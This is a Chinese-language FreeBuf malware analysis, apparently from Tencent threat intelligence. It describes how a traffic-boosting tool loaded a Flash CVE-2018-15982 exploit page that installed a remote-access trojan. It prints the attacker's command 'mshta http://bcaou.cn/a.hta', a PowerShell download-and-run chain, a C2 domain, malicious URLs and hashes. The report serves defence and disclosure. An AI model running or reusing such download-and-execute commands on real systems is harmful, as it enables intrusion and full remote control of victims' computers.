freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

    利用最新flash漏洞通过“流量宝”对流量从业者的攻击活动
    2019-01-09 14:02:20
    所属地 广东省

    一、背景

    2018年6月腾讯御见威胁情报中心曾监控到刷量神器“流量宝流量版”,在运行时自动请求带有浏览器高危漏洞(编号:CVE-2018-8174)的攻击页面,并在漏洞攻击成功后植入DDoS木马、远程控制木马、挖矿木马等。攻击造成约10万台计算机中招,其中不乏使用流量宝流量版来刷量的自媒体、视频网站主播、电商刷量团伙。 

    1月8日,腾讯御见威胁情报中心再次监控到流量宝流量版故技重施,利用该软件内嵌的Flash组件进行网页挂马攻击,本次攻击已有3000-5000台电脑中招,腾讯电脑管家已全面拦截。受害者集中在使用刷量工具的人群,包括视频网站刷量、自媒体文章刷量、网店刷量、短视频刷热点等等领域。 

    攻击页面包含攻击者精心构造的Flash漏洞(CVE-2018-15982)攻击文件(apt.swf),该Flash文件在较低版本的Adobe Flash Player程序运行时会触发漏洞导致任意代码执行。漏洞攻击成功后会进一步植入大灰狼远程控制木马,致使中招用户电脑被完全控制,进而导致系统信息被搜集、重要资料泄露、电脑行为被监控,被植入任意木马等严重后果。

    1.png

    木马攻击流程

    二、漏洞攻击

    流量宝流量版.exe

    2.png


    在运行刷量过程中会自动请求页面bcaou.cn并下载Flash漏洞攻击文件apt.swf运行。

    3.png

     

    分析发现,apt.swf包含攻击者精心构造的Adobe Flash Player

    最新漏洞(漏洞编号CVE-2018-15982)攻击代码,Adobe官方在2018年12月05日公布了该漏洞及修复建议。该楼是flash包com.adobe.tvsdk.mediacore.metadata中的一个UAF漏洞,利用该漏洞攻击可导致任意代码执行,漏洞影响版本为Adobe FlashPlayer <= 31.0.0.153。

    4.png

     

    漏洞攻击成功后会执行命令mshta http://bcaou.cn/a.hta

    5.png

    随后a.hta脚本利用powershell下载大灰狼远控木马hxxp://bcaou.cn/a.exe保存到c:\windows\temp\a.exe并拉起执行。

    6.png

    三、远控控制木马

    漏洞攻击后执行的a.exe是大灰狼远控木马母体,启动后拷贝自身到目录C:\Program Files (x86)\Microsoft Whmfyw\Whmfywy.exe并执行。

    7.png

     

    通过CreateFileA判断远控木马DLL文件NetSyst.dll是否存在

    8.png

     

    不存在则下载hxxp://bcaou.cn/NetSyst.dll

    9.png

    10.png

     

    验证通过则通过内存加载PE执行远控木马主体。

    11.png

     

    木马上线后连接C2地址qll1.net

    12.png

     

    然后根据返回的命令执行多种远控功能:

    13.png

     

    木马具有:包括查看本机信息,查看本机注册表,查看本地硬盘,上传、下载文件,删除文件,清除系统记录,查看系统服务,运行程序,结束程序,及其3389远程桌面多用户登陆,记录键盘等一系列远程功能。远控功能详细分析可参考:https://mp.weixin.qq.com/s/IbB67BWbvgvKaV-Q1ZfbxA

     

    四、安全建议

    1、升级Adobe Flash Player到较高版本,具体可参考Adobe官方公告:

    https://helpx.adobe.com/security/products/flash-player/apsb18-42.html 

    2、谨慎使用“刷量”类软件,该类软件在使用时会大量访问未经过审核检验的广告URL,导致可能访问到包含恶意代码的地址。 

    3、保持安全软件实时开启,拦截可能遭到的木马攻击。

    14.png

    IOCs

    域名:

    bcaou.cn

    qll1.net

     

    URL

    hxxp:// bcaou.cn/apt.swf

    hxxp://bcaou.cn/a.hta

    hxxp://bcaou.cn/a.exe

    hxxp://bcaou.cn/NetSyst.dll

     

    md5

    36e8fce77217b40026c643fa0ff37f14

    daf385091f17796b59a6ea1145846dda

    8c19d83ff359a1b77cb06939c2e5f0cb

    # 腾讯御见威胁情报 # 流量宝 # Flash高危漏洞
    本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022
    被以下专辑收录,发现更多精彩内容
    + 收入我的专辑
    + 加入我的收藏
    相关推荐
    • 0 文章数
    • 0 关注者